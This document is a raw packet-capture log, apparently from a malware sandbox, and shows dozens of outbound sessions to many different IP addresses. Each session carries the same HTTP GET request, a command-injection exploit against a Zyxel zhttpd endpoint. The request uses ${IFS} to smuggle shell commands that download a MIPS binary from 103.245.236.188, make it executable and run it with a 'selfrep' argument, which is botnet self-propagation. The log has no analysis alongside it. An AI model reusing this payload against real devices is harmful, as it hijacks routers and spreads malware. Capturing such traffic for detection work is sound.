                                    Jan 13, 2024 19:02:32.127087116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3901192.168.2.1341440111.173.11.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127111912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3902192.168.2.135248454.220.204.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127131939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3903192.168.2.135046427.160.206.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127182007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3904192.168.2.1341948220.177.103.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127239943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3905192.168.2.134552243.126.26.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127279043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3906192.168.2.134193063.89.43.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127331972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3907192.168.2.1360664135.29.43.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127351999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3908192.168.2.135094092.129.137.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127424002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3909192.168.2.134048660.225.163.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127455950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3910192.168.2.13403248.35.167.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127480984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3911192.168.2.1360394118.134.253.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127530098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3912192.168.2.1351500219.80.41.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127583981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3913192.168.2.135005619.132.150.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127607107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3914192.168.2.135404452.59.11.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127644062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3915192.168.2.1332930108.83.51.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127695084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3916192.168.2.1345350174.216.253.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127738953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3917192.168.2.135529898.175.86.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127772093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3918192.168.2.1343272182.209.124.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127815008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3919192.168.2.1337082128.85.116.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127856016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3920192.168.2.1353432202.92.133.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127895117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3921192.168.2.134810480.24.142.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127938986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3922192.168.2.135544493.251.37.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127984047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3923192.168.2.134533087.9.194.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128010035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3924192.168.2.1343132170.167.246.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128042936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3925192.168.2.1354154207.211.214.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128092051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3926192.168.2.13572901.57.228.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128114939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3927192.168.2.1357352154.182.67.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128169060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3928192.168.2.1338966166.131.254.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128191948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3929192.168.2.134319872.112.51.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128237963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3930192.168.2.133407695.236.251.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128258944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3931192.168.2.1355026217.239.210.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128294945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3932192.168.2.1356318171.38.71.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128364086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3933192.168.2.1345678179.91.109.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128379107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3934192.168.2.135512889.182.243.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128401995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3935192.168.2.134292254.134.75.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128424883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3936192.168.2.133668284.22.80.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128516912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3937192.168.2.13609084.175.52.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128520966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3938192.168.2.134511447.49.107.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128552914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3939192.168.2.1360804119.128.235.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128611088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3940192.168.2.1340232157.232.157.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128657103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3941192.168.2.135710459.156.107.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128690004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3942192.168.2.1356914222.78.72.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128716946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3943192.168.2.1342178169.187.107.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128746986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3944192.168.2.134010024.38.44.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128796101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3945192.168.2.1334154169.159.174.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128823996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3946192.168.2.133361049.193.119.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128863096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3947192.168.2.1333340202.214.14.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128892899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3948192.168.2.1350618178.94.226.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128927946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3949192.168.2.135465824.10.131.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.128978968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3950192.168.2.1339478128.234.238.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129004002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3951192.168.2.135436412.18.125.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129055977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3952192.168.2.1352416205.31.28.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129092932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3953192.168.2.134766072.230.157.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129141092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3954192.168.2.135464287.68.39.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129177094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3955192.168.2.134513062.204.153.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129215956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3956192.168.2.1338398183.215.19.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129276037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3957192.168.2.134916873.57.117.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129302025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3958192.168.2.134300219.220.38.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129328966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3959192.168.2.1348808131.18.255.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129369974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3960192.168.2.1339296114.166.92.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129412889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3961192.168.2.134034040.150.236.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129441977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3962192.168.2.1347294135.117.217.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.129471064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3963192.168.2.1346338185.230.12.48443
                                    TimestampBytes transferredDirectionData
